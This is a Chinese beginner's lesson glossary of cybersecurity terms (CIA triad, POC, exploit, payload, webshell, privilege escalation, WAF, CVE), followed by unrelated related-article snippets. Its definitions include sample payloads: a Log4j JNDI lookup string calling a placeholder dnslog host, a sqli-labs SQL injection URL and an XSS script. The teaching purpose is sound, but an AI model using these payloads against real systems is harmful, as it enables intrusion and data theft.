Day1--什么是网络安全?网络安全常用术语

目录

1. 什么是网络安全?

信息系统(Information System)

信息系统安全三要素(CIA)

网络空间安全管理流程

网络安全管理

2. 网络安全的常用术语

3. 网络安全形势

4. 中国网络安全产业现状


1. 什么是网络安全?

        网络空间安全包括了国家安全、城市安全、经济安全、社会安全、生产安全、人身安全等在内的“大安全”。

信息系统(Information System)

        是由计算机硬件网络通信设备计算机软件信息资源信息用户规章制度组成的以处理信息流为目的的人机一体化系统。

信息系统安全三要素(CIA)

  • 保密性(Confidentiality)
  • 完整性(Integrity)
  • 可用性(Availability)

网络空间安全管理流程

  1. 确定网络信息安全管理对象
  2. 评估网络信息安全管理对象的价值
  3. 识别网络信息安全管理对象的威胁
  4. 识别网络信息安全管理对象的脆弱性
  5. 确定网络信息安全管理对象的风险级别
  6. 制定网络信息安全防范体系及防范措施实施和落实网络信息安全防范措施
  7. 运行/维护网络信息安全设备、配置

网络安全管理

  • 《中华人民共和国网络安全法》
  • 《Cybersecurity Law of the People's Republic of China》

2. 网络安全的常用术语

黑客(hacker)对计算机技术非常擅长的人,窃取数据、破坏计算机系统。
脚本小子刚刚入门安全行业,学习了一些技术,只会用现成的工具或者从网上复制代码。
白帽子

· 白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题。

· 360补天、漏洞盒子、CNVD、CNNVD

红帽黑客有正义感、爱国的黑客。利用技术维护国家网络安全,并且对外来的攻击进行反击。

漏洞(vulnerability)

· 漏洞指的是硬件、软件协议等等存在的安全缺陷

· https://www.cnnvd.org.cn/web/wz/bzxqByld.tag?id=3&mkid=3

POC

· Proof of Concept

· 能证明漏洞存在的代码

· 例:${jndi:ldap://xxxxxx.dnslog.cn/test}

EXP

· Exploit--利用

· 执行了这一段利用代码之后,就能够达到攻击的目的。

Payload(攻击载荷)

· SQL注入--http://localhost/sqli-labs/Less-3/?id=-1')union select 1.l.database()--+

· XSS--<script>alert(1)</script>

· log4j--${jndi:ldap://xxxxxx.dnslog.cn/test}

0day漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞。【危害力很大】
1day

漏洞的POC和EXP已经被公开了,但是很多人还来不及修复这个叫做1day漏洞。 

Nday漏洞

指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。

漏扫基于数据库对漏洞进行自动化扫描。
补丁(patch)漏洞的修复程序。
渗透(penetration)

黑客入侵了网站或者计算机系统,获取控制计算机权限的过程。

渗透测试

(penetration test)

用黑客入侵的方式对系统进行安全测试,目的是找出和修复安全漏洞,在这个过程中不会影响系统的正常运行,也不会破坏数据。

木马

(Trojan horse)

隐藏在计算机中的恶意程序。
病毒(Virus)恶意代码程序。
杀毒软件瑞星、江民、金山、国外的诺顿、卡巴斯基、McAfee、360
免杀绕过杀毒软件。
肉鸡已经被黑客获得的控制权限的机器,可能是个人电脑也可能是企业或者单位的服务器,通常情况下因为使用者不知道已经被入侵,所以黑客可以长期获得权限和控制。
抓鸡利用出现概率非常高的漏洞(比如log4j、永恒之蓝),使用自动化方式获取肉鸡的行为。
跳板机黑客为了防止被追溯和识别身份,一般不会用自己的电脑发起攻击,而是利用获取到的肉鸡来攻击其他目标,这个肉鸡就充当一个跳板的角色。
DDos

· Distributed Denial of Service

· 分布式拒绝服务攻击

· 发起大量恶意请求,导致正常用户无法访问。

后门(backdoor)黑客为了对主机进行长期的控制,在机器上种植一段程序或留下一个“入口”。

中间人攻击(MITM)

· Man-in-the-Middle Attack

· MITM攻击

· 运行中间服务器,拦截并篡改数据

网络钓鱼

钓鱼网站指的是冒充的网站,用来窃取用户的账号密码。
webshell

· shell是一种命令执行工具,可以对计算机进行控制。

· webshell就是asp、php、jsp之外的web代码文件,通过这些代码文件可以执行任意的命令,对计算机做任意的操作。

Getshell

· 获得命令执行环境的操作。

· Redis的持久化功能、MySQL的写文件功能,MySQL的日志记录功能、上传功能、数据备份功能、编辑器。

提权(Privilege Escalation)

· 权限提升

· 普通用户权限,把自己提升为管理员权限的擦欧总就叫做提权。

拿站指得到一个网站的最高权限,即得到后台和管理员名字和密码。
拖库(脱裤)托库指的是网站被入侵以后,黑客把全部的数据都导出,窃取到了数据文件。
撞库用获得的裤子去批量登录其他网站。
旁站入侵

入侵服务器的其他网站。

横向移动攻击者入侵一台服务器成功以后,基于内部网络,继续入侵同网段的其他机器。
代理(Proxy)帮我们发起网络请求的一台服务器。
VPN

· Virtual Peivate Network

· 代理

· 加密通信

· 办公--在家里连接到公司内网

蜜罐(Honeypot)吸引攻击者攻击的伪装系统,用来实现溯源和反制。
沙箱(Sandbox)

· 沙箱是一种按照安全策略限制程序行为的执行环境,就算又恶意代码,也只能影响沙箱环境而不会影响到操作系统。 (360安全浏览器--带沙箱功能)

· 微步在线云沙箱:https://s.threatbook.com/

靶场

· 模拟的有漏洞的环境

· 可以是网站、容器、操作系统

堡垒机

· 跳板机--jumpserver

· 运维审计系统--管理资源,审批、审计、访问控制、事件记录

WAF

· Web Application Firewall

· Web应用防火墙。

· 对HTTP/HTTPS的流量内容进行分析,拦截恶意攻击行为。

· WAF使用场景:例如服务器中有些安全性比较差的应用程序,审计和修改全部代码比较麻烦,这时候最好的办法就似乎通过部署WAF来实现安全防护。

· WAF可以防护的常见风险包括:SQL注入、XSS、利用本地/远程文件包含漏洞进行攻击、PHP代码注入、黑客扫描网站,源代码/错误信息泄露等等。

APT攻击

· Advanced Persistent Threat

· 高级可持续威胁攻击,指某组织在网络上对特定对象展开的持续有效的攻击活动。

· 2021深信服APT攻防趋势半年洞察。

护网国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习。
CTF

CVE

· Common Vulnerabilities and Exposures--通用漏洞披露

· Mitre

· 例如:CVE-2021-4422/

· CVE Website

CNVD

· 国家信息安全漏洞共享平台--https://www.cnvd.org.cn/

· 国家计算机应激响应中心  CNCERT维护--国家互联网应急中心

 应急响应一个公司为了应对各种安全时间所做的准备和事后采取的措施。

SRC

· Security Response Center---企业的应急响应中心

· SRCs|安全应急响应中心 - 0xsafe

公益SRC

· 漏洞盒子 - 中国领先的漏洞平台与白帽社区|安全众测与安全运营服务平台

· 教育漏洞报告平台(EDUSRC)

网络空间测绘

· 网络空间资源收录

ATT&CK

· 风险分析模型--收集威胁情报,模拟APT攻击

逆向(Reverse)· 把程序还原为源代码,分析程序的运行过程
DevOps

· Development +Operations--安全开发与运维

· 开发测试运维一体化

CICD
等保

· 网络安全等级保护

· 要求相关行业单位和公司的信息系统必须进行定级,然后再公安机关备案,然后建设整改,然后由测评机构评级,并且持续维护和监督。

3. 网络安全形势

        FireEye网络威胁地图:

                https://www.fireeye.com/cyber-map/threat-map.html

        卡巴斯基实时威胁地图:

                地图 | 卡巴斯基网络威胁实时地图

        安全事件分类:GBZ20986-2007《信息安全技术 信息安全事件分类分级指南》

4. 中国网络安全产业现状

        安全产业:
                中国网络安全行业全景图(2020年3月第七版).pdf

                CCSIP 2021中国网络安全产业全景图第三版final.pdf

                2021年网络安全产业分析报告V1.020211011
                

                2021年网络安全产业态势总结

                        https://www.secrss.com/articles/38043

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/3063.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

wps/word中字体安装教程

问题&#xff1a;下载的字体怎么导入wps/word wps或word中没有相应字体&#xff0c;怎么导入。其实方法很简单。 Step 1&#xff1a;下载字体 首先&#xff0c;在网上搜索自己喜欢的字体&#xff0c;然后下载到本地。字体的格式通常是.ttf 下面是我网上找的字体&#xff08…

【Camera KMD ISP SubSystem笔记】CAM SYNC与DRQ①

在android系统中fence用于不同模块需要访问同一块buffer的同步&#xff0c;例如camera和graphic。对于preview buffer, camera是生产者graphic是消费者。 camera需要生产图像数据到preview buffer时需要等待preview buffer的 fence可用。 camera sync是高通camx框架里面用于各个…

【LeetCode】191. 位1的个数

题目链接&#xff1a;191. 位1的个数 题目描述&#xff1a; 解法1&#xff1a;题意很简单就不说了&#xff0c;这里先说一种最简单的解法&#xff0c;首先我们知道一点&#xff1a;n&(n-1)相当于把是将n的二进制位中最低位的1变为了0&#xff0c;其它位保持不变&#xff0…

强制内容在一行显示

强制内容在一行显示 .one {white-space: nowrap;overflow: hidden;text-overflow: ellipsis; /* 可选&#xff0c;当内容超出一行时&#xff0c;用省略号表示 */ }效果

【机器学习】概率模型在机器学习中的应用:以朴素贝叶斯分类去为例

概率模型在机器学习中的应用&#xff1a;以朴素贝叶斯分类器为例 一、概率模型的基本原理二、朴素贝叶斯分类器的原理与实现三、朴素贝叶斯分类器的应用与挑战四、结论与展望 在大数据与人工智能时代&#xff0c;概率模型在各个领域发挥着至关重要的作用。概率模型以概率论和统…

基于STM32F4系列的ETH IAP在线升级程序

目录 1、前言 2、以太网的移植&#xff08;无操作系统&#xff09; 3、移植FATS 系统 4、移植ETH 驱动及 DP83848驱动 5、Tftp 服务程序 6、注意事项 ​7、代码 资料下载地址&#xff1a;基于STM32F4系列的ETH IAP在线升级程序 1、前言 此bootloader程序可以通过http…

网络爬虫之HTTP原理

** URI和URL URI的全称Uniform Resource Identifier &#xff0c;即统一资源标志符。URL的全称Uniform Resource Locator 即统一资源定位符。 URL是URI的子集&#xff0c;也就是每一个URL就是URI&#xff0c;但是每一个URI不一定是URL&#xff0c;URI还有一个子类叫URN&#x…

从零开始写 Docker(十二)---实现 mydocker stop 停止容器

本文为从零开始写 Docker 系列第十二篇&#xff0c;实现类似 docker stop 的功能&#xff0c;使得我们能够停止指定容器。 完整代码见&#xff1a;https://github.com/lixd/mydocker 欢迎 Star 推荐阅读以下文章对 docker 基本实现有一个大致认识&#xff1a; 核心原理&#x…

[韭]第一次参加护网行动要注意什么??

前言 为什么要写这篇文章呢&#xff0c;一是对当下安全环境进行一个分析&#xff0c;二是以过来人的身份留下一点经验。 当下安全环境分析 现在这个时代&#xff0c;大家都已经踏上了信息高速公路&#xff0c;可以自己拿搜索引擎搜一下自己知道的大厂裁员情况&#xff0c;有…

油猴脚本:bing 搜索结果居中

文章目录 效果预览脚本使用步骤安装油猴脚本添加脚本 效果预览 脚本 // UserScript // name bing居中 // namespace http://tampermonkey.net/ // version 2024-04-24 // description try to take over the world! // author You // match http…

rust 卸载重新安装 安装

原因&#xff1a;接触区块链时报错 linking with x86_64-w64-mingw32-gcc failed: exit code: 1 Rust编译需要C环境&#xff0c;如果你没有&#xff0c;Rust也能安装成功&#xff0c;只是无法编译代码 C的编译工具有两个&#xff0c;一个是msvc&#xff0c;也就是visual studi…

CTFshow-PWN-栈溢出(pwn44)

64位的 system(); 但是好像没"/bin/sh" 上面的办法不行了&#xff0c;想想办法 检查&#xff1a; 是 64 位程序 ida 反编译 main 函数&#xff1a; 跟进 ctfshow 函数&#xff1a; 存在栈溢出 offset&#xff1a;0xAh8 在前面经验的基础上&#xff0c;这里我们直…

Python-VBA函数之旅-issubclass函数

目录 一、issubclass函数的常见应用场景&#xff1a; 二、issubclass函数使用注意事项&#xff1a; 三、如何用好issubclass函数&#xff1f; 1、issubclass函数&#xff1a; 1-1、Python&#xff1a; 1-2、VBA&#xff1a; 2、推荐阅读&#xff1a; 个人主页&#xff…

Linux下载及安装OpenSSL

文章目录 前言一、OpenSSL下载二、OpenSSL安装1.上传下载好的安装包到服务器2.解压3.切换目录4.配置config5.编译6.安装7.备份旧版本OpenSSL7.创建软链接8.添加OpenSSL动态链接库9.更新库缓存10.查看OpenSSL版本验证安装是否成功 前言 一般系统会自带有OpenSSL&#xff0c;我们…

ubuntu 24.04 beta server NAT模式上网设置

在Ubuntu 24.04 Beta上设置网络通常涉及使用命令行工具。以下是设置静态IP地址和动态IP地址的步骤&#xff1a; 动态IP设置&#xff1a; 查找你的网络接口名称&#xff1a; ip a ens37是我NAT模型的一张网卡&#xff0c;此时是没有ip的。 下面介绍如何NAT模式下添加DHCP动态…

【数据结构与算法】:带你手搓顺序表(C/C++篇)

文章目录 一、顺序表1.1 线性表 二、顺序表2.1 概念及结构2.2 实现方法1. 顺序表的初始化2. 顺序表的销毁3. 扩容4. 尾部插入/尾部删除5. 头部插入/头部删除6. 指定位置插入/删除7. 顺序表的查找8. 顺序表元素的索引9. 顺序表元素的修改10. SeqList.c完整代码 一、顺序表 1.1 …

FL Studio21中文版值不值得下载?2024优点和缺点测评介绍

FL Studio21的优点和缺点分析如下&#xff1a; 优点&#xff1a; 功能全面&#xff1a; FL Studio 21提供了从音频录制、编辑到混音和母带处理的全套工具&#xff0c;满足音乐制作的全流程需求。内置多种虚拟乐器和效果器&#xff0c;覆盖了广泛的音色和风格。直观易用&#…

粒子群算法(PSO)matlab代码实现

粒子群算法(PSO)matlab代码实现 %% 清空命令行和工作区 clc clear %% 目标函数&#xff1a;求解函数在[0,50]区间上的最小值 f(x) x.*sin(x).*cos(2*x) - 2.*sin(3*x)3*x.*sin(4*x); %% 初始化算法参数 population50; % 粒子的数量 dimension1; …

frp 实现 http / tcp 内网穿透(穿透 wordpress )

frp 实现 http / tcp 内网穿透&#xff08;穿透 wordpress &#xff09; 1. 背景简介与软件安装2. 服务端配置2.1 配置文件2.2 wordpress 配置文件2.3 frps 自启动 3.客户端配置3.1 配置文件3.2 frpc 自启动 同步发布在个人笔记frp 实现 http / tcp 内网穿透&#xff08;穿透 w…

详细分析mysqlslap的基本知识 | 压力测试(附Demo)

目录 前言1. 基本知识2. 参数解读2.1 auto-generate-sql2.2 only-print2.3 iterations2.4 并发处理参数 前言 对数据库进行压力测试&#xff0c;对此补充这方面的详细知识点 1. 基本知识 mysqlslap 是 MySQL 自带的用于模拟数据库负载的压力测试工具 可以模拟多个客户端并发…